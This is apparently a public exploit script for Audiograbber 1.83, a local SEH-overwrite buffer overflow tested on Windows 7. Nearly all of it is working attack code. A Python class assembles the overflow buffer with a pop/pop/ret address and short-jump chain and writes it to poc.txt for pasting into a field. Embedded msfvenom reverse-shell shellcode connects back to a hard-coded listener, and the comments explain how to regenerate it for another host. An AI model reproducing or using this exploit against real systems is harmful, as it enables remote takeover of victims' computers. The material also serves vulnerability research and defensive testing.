# Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH)
# Date: 2018-06-16
# Exploit Author: Dennis 'dhn' Herrmann
# Vendor Homepage: https://www.audiograbber.org/
# Version: 1.83
# Tested on: Windows 7 SP1 (x86)

#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $
#
# Tested with Windows 7 SP1 (x86)
# Steps:
# - Run this script; it writes the payload to "poc.txt" in the current directory
# - Paste the contents of "poc.txt" into the "Interpret" or "Album" field

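class Exploit:
    """Build and write the Audiograbber 1.83 SEH-overwrite payload.

    Buffer layout (byte offsets):

      0    256 x "A"           filler up to the SEH record
      256  EB 08 90 90         nSEH: jmp short +8, hops over the handler address
      260  79 91 01 10         SEH: pop/pop/ret at 0x10019179 (WMA8Connect.dll)
      264  18 NOPs + jmp +8    the buffer past the SEH record is mangled, so
      286  28 NOPs + jmp +8    three short hops ride over the damaged parts
      318  32 NOPs
      350  shellcode

    Each "jmp short 0x08" lands 8 bytes past its own end, i.e. inside the
    NOP run that follows it, so the hop distances are fixed by the NOP
    counts above. Changing a NOP count without re-checking the landing
    point breaks the chain.
    """

    # Bytes the shellcode must not contain: 0x00 ends the C string the field
    # is copied into, 0x0a/0x0d would cut the pasted line. This is the same
    # list handed to msfvenom via -b in main().
    BAD_CHARS = b"\x00\x0a\x0d"

    _FILLER = b"A" * 256
    _JMP_SHORT = b"\xeb\x08\x90\x90"   # jmp short +8 ; nop ; nop
    _POP2RET = b"\x79\x91\x01\x10"     # 0x10019179 little-endian, WMA8Connect.dll

    def __init__(self, shellcode):
        """Store the shellcode.

        Args:
            shellcode: raw bytes, or a str whose characters are all <= 0xff
                (a Python 2 style "\\xNN" string). A str is mapped onto
                bytes with latin-1 so every character becomes exactly one
                byte; UTF-8 would expand bytes >= 0x80 and shift offsets.
        """
        if not isinstance(shellcode, (bytes, bytearray)):
            shellcode = shellcode.encode("latin-1")
        self._shellcode = bytes(shellcode)
        self._payload = None

    def build(self):
        """Assemble the payload and return it as bytes (no disk access).

        Returns:
            The complete buffer, shellcode included, also kept in
            ``self._payload``.

        Raises:
            ValueError: the shellcode is empty or contains a byte listed in
                BAD_CHARS. Catching this here avoids a silently truncated
                payload once pasted into the field.
        """
        if not self._shellcode:
            raise ValueError("shellcode is empty")
        # bytearray iteration yields ints on both Python 2 and 3.
        bad = sorted(set(bytearray(self._shellcode)) & set(bytearray(self.BAD_CHARS)))
        if bad:
            raise ValueError(
                "shellcode contains bad character(s): %s"
                % ", ".join("0x%02x" % b for b in bad)
            )
        parts = [
            self._FILLER,
            self._JMP_SHORT,
            self._POP2RET,
            b"\x90" * 18 + self._JMP_SHORT,
            b"\x90" * 28 + self._JMP_SHORT,
            b"\x90" * 32 + self._shellcode,
        ]
        self._payload = b"".join(parts)
        return self._payload

    def run(self, path="poc.txt"):
        """Build the payload and write it to ``path`` (default "poc.txt").

        Args:
            path: output file; written in binary mode so the bytes land on
                disk exactly as built (a text-mode write could re-encode
                anything >= 0x80 or translate line endings).
        """
        self.build()
        self.__write(path)

    def __write(self, path):
        # Context manager guarantees the handle is closed even if the write fails.
        with open(path, "wb") as handle:
            handle.write(self._payload)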

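def main():
    """Write poc.txt containing the SEH payload with a reverse-shell stager.

    The shellcode below was generated with:

        msfvenom --platform windows -p windows/shell_reverse_tcp
            LHOST=10.168.142.129 LPORT=443 -b "\\x00\\x0a\\x0d"
            -e x86/alpha_mixed -f py

    LHOST and LPORT are baked into these bytes. Regenerate the shellcode
    for your own listener with the same -b list (NUL, LF and CR must stay
    absent because the payload is pasted into a text field) instead of
    patching the bytes by hand; Exploit.build() rejects any bad character
    that slips through.
    """
    # msfvenom --platform windows -p windows/shell_reverse_tcp
    # LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d"
    # -e x86/alpha_mixed -f py
    shellcode = (
        b"\xda\xcd\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49"
        b"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51"
        b"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
        b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
        b"\x38\x41\x42\x75\x4a\x49\x39\x6c\x59\x78\x6f\x72\x77"
        b"\x70\x73\x30\x73\x30\x43\x50\x4e\x69\x6b\x55\x55\x61"
        b"\x69\x50\x32\x44\x6c\x4b\x76\x30\x70\x30\x6e\x6b\x50"
        b"\x52\x54\x4c\x4c\x4b\x72\x72\x47\x64\x6c\x4b\x74\x32"
        b"\x46\x48\x36\x6f\x6d\x67\x73\x7a\x67\x56\x74\x71\x6b"
        b"\x4f\x4e\x4c\x37\x4c\x51\x71\x53\x4c\x53\x32\x34\x6c"
        b"\x75\x70\x59\x51\x78\x4f\x56\x6d\x73\x31\x79\x57\x6b"
        b"\x52\x4b\x42\x71\x42\x56\x37\x4c\x4b\x63\x62\x74\x50"
        b"\x6e\x6b\x52\x6a\x57\x4c\x4c\x4b\x42\x6c\x54\x51\x32"
        b"\x58\x4d\x33\x37\x38\x57\x71\x58\x51\x76\x31\x4e\x6b"
        b"\x33\x69\x31\x30\x37\x71\x4e\x33\x6e\x6b\x61\x59\x47"
        b"\x68\x4a\x43\x47\x4a\x43\x79\x4e\x6b\x76\x54\x6e\x6b"
        b"\x37\x71\x38\x56\x74\x71\x59\x6f\x4c\x6c\x4b\x71\x78"
        b"\x4f\x36\x6d\x36\x61\x68\x47\x75\x68\x6b\x50\x70\x75"
        b"\x39\x66\x55\x53\x31\x6d\x4c\x38\x35\x6b\x73\x4d\x71"
        b"\x34\x62\x55\x4a\x44\x73\x68\x4c\x4b\x31\x48\x61\x34"
        b"\x76\x61\x58\x53\x30\x66\x6e\x6b\x76\x6c\x50\x4b\x4e"
        b"\x6b\x31\x48\x35\x4c\x67\x71\x59\x43\x4c\x4b\x37\x74"
        b"\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x33\x74\x55\x74\x45"
        b"\x74\x73\x6b\x43\x6b\x31\x71\x31\x49\x53\x6a\x43\x61"
        b"\x4b\x4f\x79\x70\x63\x6f\x73\x6f\x70\x5a\x4c\x4b\x64"
        b"\x52\x5a\x4b\x6c\x4d\x43\x6d\x52\x48\x30\x33\x67\x42"
        b"\x37\x70\x73\x30\x35\x38\x34\x37\x53\x43\x76\x52\x33"
        b"\x6f\x53\x64\x63\x58\x30\x4c\x33\x47\x76\x46\x44\x47"
        b"\x6b\x4f\x38\x55\x6d\x68\x4a\x30\x37\x71\x47\x70\x47"
        b"\x70\x55\x79\x69\x54\x76\x34\x46\x30\x35\x38\x45\x79"
        b"\x6d\x50\x70\x6b\x57\x70\x79\x6f\x4a\x75\x56\x30\x56"
        b"\x30\x30\x50\x46\x30\x73\x70\x30\x50\x43\x70\x72\x70"
        b"\x62\x48\x4b\x5a\x44\x4f\x59\x4f\x6d\x30\x49\x6f\x7a"
        b"\x75\x7a\x37\x51\x7a\x55\x55\x53\x58\x76\x6a\x6e\x48"
        b"\x4c\x4e\x6e\x61\x73\x58\x44\x42\x67\x70\x47\x71\x4f"
        b"\x4b\x4d\x59\x4d\x36\x53\x5a\x34\x50\x70\x56\x76\x37"
        b"\x31\x78\x6e\x79\x49\x35\x44\x34\x53\x51\x49\x6f\x68"
        b"\x55\x6d\x55\x6f\x30\x50\x74\x36\x6c\x69\x6f\x50\x4e"
        b"\x56\x68\x52\x55\x6a\x4c\x73\x58\x6a\x50\x58\x35\x6c"
        b"\x62\x46\x36\x59\x6f\x48\x55\x32\x48\x43\x53\x30\x6d"
        b"\x63\x54\x77\x70\x6f\x79\x78\x63\x56\x37\x32\x77\x46"
        b"\x37\x50\x31\x59\x66\x32\x4a\x46\x72\x53\x69\x62\x76"
        b"\x79\x72\x59\x6d\x52\x46\x59\x57\x63\x74\x51\x34\x37"
        b"\x4c\x76\x61\x66\x61\x6c\x4d\x61\x54\x44\x64\x42\x30"
        b"\x6b\x76\x73\x30\x42\x64\x63\x64\x52\x70\x31\x46\x51"
        b"\x46\x50\x56\x42\x66\x30\x56\x62\x6e\x71\x46\x76\x36"
        b"\x36\x33\x71\x46\x42\x48\x74\x39\x7a\x6c\x55\x6f\x4f"
        b"\x76\x59\x6f\x6b\x65\x4b\x39\x59\x70\x70\x4e\x66\x36"
        b"\x30\x46\x59\x6f\x64\x70\x31\x78\x67\x78\x6c\x47\x67"
        b"\x6d\x35\x30\x49\x6f\x78\x55\x4d\x6b\x58\x70\x6d\x65"
        b"\x6f\x52\x36\x36\x73\x58\x6c\x66\x7a\x35\x4d\x6d\x6d"
        b"\x4d\x59\x6f\x59\x45\x75\x6c\x53\x36\x31\x6c\x47\x7a"
        b"\x6d\x50\x49\x6b\x79\x70\x70\x75\x36\x65\x6f\x4b\x77"
        b"\x37\x62\x33\x61\x62\x70\x6f\x71\x7a\x45\x50\x61\x43"
        b"\x6b\x4f\x69\x45\x41\x41"
    )

    exploit = Exploit(shellcode)
    exploit.run()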


# Script entry point: only generate the file when executed directly, never on import.
if __name__ == "__main__":
    raise SystemExit(main())